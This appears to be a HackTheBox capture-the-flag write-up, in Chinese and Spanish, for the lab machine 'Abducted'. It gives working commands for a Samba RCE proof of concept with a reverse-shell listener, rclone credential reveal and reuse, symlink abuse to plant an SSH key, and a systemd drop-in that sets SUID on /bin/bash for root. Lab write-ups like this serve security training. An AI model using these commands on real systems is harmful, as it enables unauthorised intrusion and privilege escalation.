Cosm3No1de/HTB-Abducted-Writeup

GitHub: Cosm3No1de/HTB-Abducted-Writeup

HackTheBox Linux 靶机 Abducted 的渗透测试 write-up,演示了从 Samba RCE 到 systemd 提权的完整攻击链。

Stars: 0 | Forks: 0

![Abducted](https://raw.githubusercontent.com/Cosm3No1de/HTB-Abducted-Writeup/main/abducted.png) # 🛸 Abducted – HackTheBox Machine Write-up **靶机:** Abducted **难度:** 中等 **系统:** Linux **技术:** SMB, CVE-2026-4480, 通过 systemd 提权, 滥用 wide links 和 force user, SUID ## 📖 描述 **Abducted** 是一台 HackTheBox 的 Linux 靶机,它利用了 Samba 打印子系统中一个严重的漏洞(**CVE-2026-4480**)来实现远程代码执行(RCE)。在获得 `nobody` 用户的初始 shell 后,通过枚举配置文件,发现了使用 `rclone` 混淆的凭据,从而允许通过 SSH 登录用户 `scott`。通过滥用 SMB 的不安全配置(`wide links` 和 `force user = marcus`),可以横向提权到用户 `marcus`,最后,利用在 systemd 目录中的写入权限,通过 `/bin/bash` 上的 SUID 获得 `root` 访问权限。 本 write-up 记录了完整的枚举、漏洞利用和权限提升过程,旨在为 pentester 和安全爱好者提供教育性质的指南。 ## 📌 流程摘要 1. **侦察** - 端口扫描:SSH (22) 和 SMB (139, 445)。 - 使用空认证枚举 SMB 共享资源。 - 识别出具有写入权限的 `HP-Reception` 打印机共享。 2. **漏洞利用 (CVE-2026-4480)** - 使用公开的 PoC 通过打印作业描述执行命令。 - 获取作为 `nobody` 用户的反弹 shell。 3. **后渗透与凭据获取** - 在标准路径之外搜索 `.conf` 文件。 - 发现 `/opt/offsite-backup/rclone.conf` 包含 `svc-backup` 的混淆凭据。 - 通过 `rclone reveal` 解码密码。 - 该密码适用于通过 SSH 登录的用户 `scott`。 4. **标准用户访问** - 通过 SSH 登录 `scott`。 - 读取 user flag。 5. **提权至 Marcus(滥用 SMB)** - 验证易受攻击的配置:`transfer` 共享中的 `wide links = yes` 和 `force user = marcus`。 - 创建一个从 `/srv/transfer/keys` 到 `/home/marcus` 的符号链接。 - 生成 SSH 密钥,并将公钥上传到 Marcus 的 `.ssh` 目录中。 - 使用私钥以 `marcus` 身份进行 SSH 登录。 6. **提权至 root(systemd + SUID)** - 发现 `marcus` 属于 `operators` 组。 - `operators` 组对 `/etc/systemd/system/smbd.service.d` 具有写入权限。 - 创建一个 drop-in (`daffy.conf`),在 `smbd` 启动前执行 `chmod +s /bin/bash`。 - 重启 `smbd` 服务以激活 `/bin/bash` 上的 SUID 位。 - 执行 `/bin/bash -p` 以获取具有 `root` 权限的 shell。 - 读取 root flag。 ## 🛠️ 使用的工具 - `nmap` - `nxc` (NetExec) / `crackmapexec` - `smbclient` - `rclone` - `ssh-keygen` - `systemctl` ## 🚀 漏洞利用与关键命令 ### 1. 枚举 SMB 共享 ``` nxc smb abducted.htb -u '' -p '' --shares 2. Clonar y ejecutar el PoC de CVE-2026-4480 bash git clone https://github.com/TheCyberGeek/CVE-2026-4480-PoC.git cd CVE-2026-4480-PoC nc -lvnp 8443 python3 exploit.py 10.129.244.177 8443 -P HP-Reception 3. Decodificar contraseña ofuscada de rclone bash rclone reveal 4. Acceso SSH como scott bash ssh scott@10.129.244.177 5. Subir clave pública a Marcus vía SMB bash ssh-keygen -q -t ed25519 -N '' -f /tmp/k ln -s /home/marcus /srv/transfer/keys smbclient //127.0.0.1/transfer -U 'scott%' -c 'mkdir keys/.ssh; put /tmp/k.pub keys/.ssh/authorized_keys' ssh marcus@localhost -i /tmp/k 6. Escalada a root con systemd bash cat > /etc/systemd/system/smbd.service.d/daffy.conf << 'EOF' [Service] ExecStartPre=/bin/bash -c 'chmod +s /bin/bash' EOF systemctl daemon-reload systemctl restart smbd /bin/bash -p cat /root/root.txt 🔒 Flags (redactadas) User flag: [REDACTED] Root flag: [REDACTED] 📚 Referencias CVE-2026-4480 PoC HackTheBox - Abducted 👨‍💻 Autor cosmenoide dev GitHub · Portfolio# HTB-Abducted-Writeup HTB "Abducted" write-up. Exploit CVE-2026-4480 (Samba RCE) → SMB wide links → systemd → root. Full methodology and flags. ```
标签:Samba, StruQ, Web报告查看器, XXE攻击, 内存分配, 协议分析, 后端开发, 安全, 应用安全, 权限提升, 超时处理, 逆向工具